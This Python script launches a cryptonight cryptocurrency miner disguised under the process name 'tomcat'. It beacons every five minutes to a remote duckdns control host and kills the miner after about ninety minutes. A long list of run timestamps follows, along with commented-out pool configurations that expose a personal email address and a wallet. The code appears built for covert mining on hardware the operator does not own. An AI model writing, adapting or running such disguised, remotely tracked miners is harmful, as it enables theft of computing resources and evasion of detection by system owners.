import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:08.256999
#2018-02-17 15:55:07.369135
#2018-02-17 17:43:04.668141
#2018-02-17 19:29:06.302954
#2018-02-17 21:18:01.443545
#2018-02-17 23:02:04.249483
#2018-02-18 00:49:06.194941
#2018-02-18 02:36:01.282461
#2018-02-18 04:22:06.989720
#2018-02-18 06:13:01.845901
#2018-02-18 08:03:06.368790
#2018-02-18 09:51:03.674702
#2018-02-18 11:38:07.301034
#2018-02-18 13:23:02.148701
#2018-02-18 15:13:04.249558
#2018-02-18 17:02:06.689935
#2018-02-18 18:49:04.232155
#2018-02-18 20:36:01.864852
#2018-02-18 22:21:06.523060
#2018-02-19 00:10:08.249136
#2018-02-19 01:57:07.162347
#2018-02-19 03:44:03.646122
#2018-02-19 05:30:07.946092
#2018-02-19 07:17:04.709691
#2018-02-19 09:06:05.347945
#2018-02-19 10:54:08.281946
#2018-02-19 12:43:05.529590
#2018-02-19 14:29:04.081936
#2018-02-19 16:17:01.663780
#2018-02-19 18:03:07.200958
#2018-02-19 19:51:01.267930
#2018-02-19 21:40:09.270676
#2018-02-19 23:26:07.731954
#2018-02-20 01:11:07.691416
#2018-02-20 02:59:05.649808
#2018-02-20 04:47:05.267092
#2018-02-20 06:31:06.382798
#2018-02-20 08:18:06.328537
#2018-02-20 10:04:01.230297
#2018-02-20 11:48:01.736684
#2018-02-20 13:35:11.617729
#2018-02-20 15:19:04.117272
#2018-02-20 17:04:12.864690
#2018-02-20 18:52:01.931822
#2018-02-20 20:43:07.420172
#2018-02-20 22:29:01.514247
#2018-02-21 00:09:06.837046
#2018-02-21 01:54:06.401763
#2018-02-21 03:44:07.554561
#2018-02-21 05:33:07.336524
#2018-02-21 07:21:07.159957
#2018-02-21 09:06:01.551012
#2018-02-21 10:54:01.539465
#2018-02-21 12:40:08.272240
#2018-02-21 14:28:01.268747
#2018-02-21 16:16:05.065165
#2018-02-21 18:07:06.072423
#2018-02-21 19:52:06.279119
#2018-02-21 21:40:07.220188
#2018-02-21 23:27:04.145666
#2018-02-22 01:15:09.113254
#2018-02-22 03:05:08.702998
#2018-02-22 04:51:05.097946
#2018-02-22 06:36:04.926858
#2018-02-22 08:24:01.877761
#2018-02-22 10:12:07.747308
#2018-02-22 11:56:09.599140
#2018-02-22 13:43:07.243288
#2018-02-22 15:31:01.959405
#2018-02-22 17:17:05.538589
#2018-02-22 19:04:06.156171
#2018-02-22 20:54:09.965464
#2018-02-22 22:41:05.706004
#2018-02-23 00:28:02.156655
#2018-02-23 02:14:04.646599
#2018-02-23 04:04:03.921456
#2018-02-23 05:51:01.690035
#2018-02-23 07:37:06.134225
#2018-02-23 09:39:05.644017
#2018-02-23 11:43:04.014182
#2018-02-23 13:34:07.691331
#2018-02-23 15:22:02.071498
#2018-02-23 17:08:08.730945
#2018-02-23 18:54:08.400069
#2018-02-23 20:40:04.368897
#2018-02-23 22:27:04.277755
#2018-02-24 00:11:06.067383
#2018-02-24 02:03:01.746562
#2018-02-24 03:53:03.354003
#2018-02-24 05:39:07.461642
#2018-02-24 07:27:07.430229
#2018-02-24 09:15:07.473692
#2018-02-24 11:10:07.420984
#2018-02-24 12:59:01.217192
#2018-02-24 14:47:01.280741
#2018-02-24 16:40:01.289342
#2018-02-24 18:28:07.295520
#2018-02-24 20:15:09.516647
#2018-02-24 22:06:03.990952
#2018-02-25 02:26:06.383249
#2018-02-25 06:06:04.890055
#2018-02-25 11:38:04.409489